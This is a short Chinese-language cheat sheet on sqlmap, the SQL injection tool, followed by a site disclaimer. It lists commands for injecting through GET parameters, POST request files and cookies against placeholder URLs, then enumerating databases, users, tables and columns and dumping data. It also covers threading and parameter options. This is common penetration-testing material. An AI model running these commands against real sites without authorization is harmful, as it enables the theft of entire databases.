注入基本上可分为以下三种:
1.get类:sqlmap -u “http://xxx?x=xx”
2.post类: sqlmap -r “xxx.txt”
3.cookie类: sqlmap -u “http://xxx?x=xx” –cookie=”x=xx&y=yy” –level=2
一 get类
1,枚举数据库:sqlmap -u “http://xxx?x=xx” –dbs
2,获取当前数据库:sqlmap -u “http://xxx?x=xx” –current-db
3,获取当前用户名:sqlmap -u “http://xxx?x=xx” –current-user
4,枚举表: sqlmap -u “http://xxx?x=xx” -D “库名” –tables
5,枚举字段:sqlmap -u “http://xxx?x=xx” -D “库名” -T “表名” –columns
6,数据dump:sqlmap -u “http://xxx?x=xx” -D “库名” -T “表名” –dump
或者dump指定列:sqlmap -u “http://xxx?x=xx” -D “库名” -T “表名” -C “xx,yy,zz” –dump
二 post类
一般来说,要进行post注入,首先要用burpsuite等工具将要注入的post表单提取出来保存在一个txt文档中,然后开始注入
枚举数据库:sqlmap -r “xxx.txt” –dbs
(PS:其他和get型一样)
三 cookie类
因为默认情况下sqlmap只支持get/post参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,因此要进行cookie注入,直接在后面加上 –level 2 即可
枚举数据库:sqlmap -u “http://xxx?x=xx” –cookie=”x=xx&y=yy” –level=2 –dbs
四 其他一些常用的参数
–threads 多线程,可以让sqlmap跑得更快
eg: sqlmap -u “http://xxx?x=xx” –threads 10 –dbs
-p 手动指定注入参数
eg: sqlmap -u “http://xxx?x=xx” -p “id” –threads 10 –dbs
–dbms 指定注入的数据库管理系统,当已知目标的数据库管理系统时使用
eg: sqlmap -u “http://xxx?x=xx” -p “id” –dbms “MYSQL” –threads 10 –dbs
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
暂无评论内容